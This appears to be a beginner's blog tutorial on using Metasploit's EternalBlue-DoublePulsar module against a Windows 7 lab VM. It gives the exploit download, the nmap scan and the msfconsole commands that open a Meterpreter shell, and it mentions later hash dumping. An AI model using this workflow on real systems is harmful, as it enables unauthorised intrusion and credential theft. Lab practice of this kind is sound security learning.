How to attack Windows7 using Metasploit
How to attack Windows7 using Metasploit
Hi Medium! Here we are again with a new article, today we will share a small tutorial where we attack a Windows 7 and have a Meterpreter shell on it, so we will talk about :
+ What is Metasploit?
+ What is Meterpreter?
+ What is Eternalblue?
+ exploit
+ What is Metasploit?
Metasploit is a tool that helps in Penetration Test and IDS signature and provide so many exploits that helps to find security vulnerability.
+ What is Meterpreter?
Meterpreter is a tool that is packaged together with the Metasploit framework. The features of Meterpreter are:
1. Does not create any files on the hard disk, it resides in memory and attaches itself to a process.
2. client-server communication is in the form of a type-length-value (TLV) format.
3. client-server communication between the attacker machine and victim machine is encrypted.
4. It provides a platform to write extensions.
+ What is EternalBlue?
EternalBlue, sometimes stylized as ETERNALBLUE is an exploit developed by the U.S. National Security Agency (NSA) according to testimony by former NSA employees. It was leaked by the Shadow Brokers hacker group on April 14, 2017, and was used as part of the worldwide WannaCry ransomware attack on May 12, 2017. The exploit was also used to help carry out the 2017 NotPetya cyberattack on June 27, 2017, and reported to be used as part of the Retefe banking trojan since at least September 5, 2017. EternalBlue that based on multiple vulnerabilities in the Windows implementation of SMB protocol.
if you want to understand more about how eternal blue work I recommend you to check this link: https://research.checkpoint.com/eternalblue-everything-know/
+ Exploit :
Here we are after explaining some important operative word, this exploitation is really easy I recommend all security beginner (like me :p) to start with those simple steps to have an idea of “how you can attack a target” and know exactly if you are interested to work with the blue team or red team, I highly recommend to understand EternalBlue at least for 60%.
So we will need two .iso images Windows7 64bits or 32bits, Kali and Oracle VM Virtual Box LINK, let’s begin.
1- Create two new Virtual machine Kali and Windows 7
You can follow that Tutorial (Kali, Windows 7) if this is your first time you create a new virtual machine so you don’t face any problem, if the virtualization option is not activated in BIOS check this LINK
Go to Networks settings for both machines choose bridged or NAT (I personally prefer to use bridged) so your both machine can communicate between them and they dynamically get IP addresses.
Check you IP@ on Windows7 this will be our Target T
+ Before we begin we need to run those command to update our kali OS :$ apt-get update$ apt-get upgradeand install our exploit from github on Kali (the normal exploit that you found in Metasploit can't work on Windows7 32 bits)$ cd /root$ git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git$ mv /Eternalblue-Doublepulsar-Metasploit/eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb
2 — scan the target
In real life you will not get the IP address of the victim easily so first you need to run a full scan on your network and search for some important details like OS’s version… using NMAP
$ nmap -v -Pn -O <ip@>
As we will use EternalBlue we just need to ensure that smb port 445 is open.
3- Run Metasploit
run $msfconsole on your terminal to open Metasploit, know we need to set the exploit that we will use with this command> use exploit/windows/smb/eternalblue_doublepulsar.rbafter we check what options we need to set to begin the attack :> show optionsHere we will set our target, the port is already configured by default 445, and the listener will be automatically configured with your Kali machine IP @ :> set RHOST <Target IP@>> set RPORT 445To run the attack we just type :> run "or" exploit
Here a Meterpreter line command opened on our victim and from here we can run more exploits to dumps the hash of passwords and run other attacks….
+ references
https://cyruslab.net/2012/03/07/metasploit-about-meterpreter/
https://en.wikipedia.org/wiki/EternalBlue
I hope that you enjoyed this article as always, if you have something to add don’t hesitate to write a comment ^^ and to follow :p
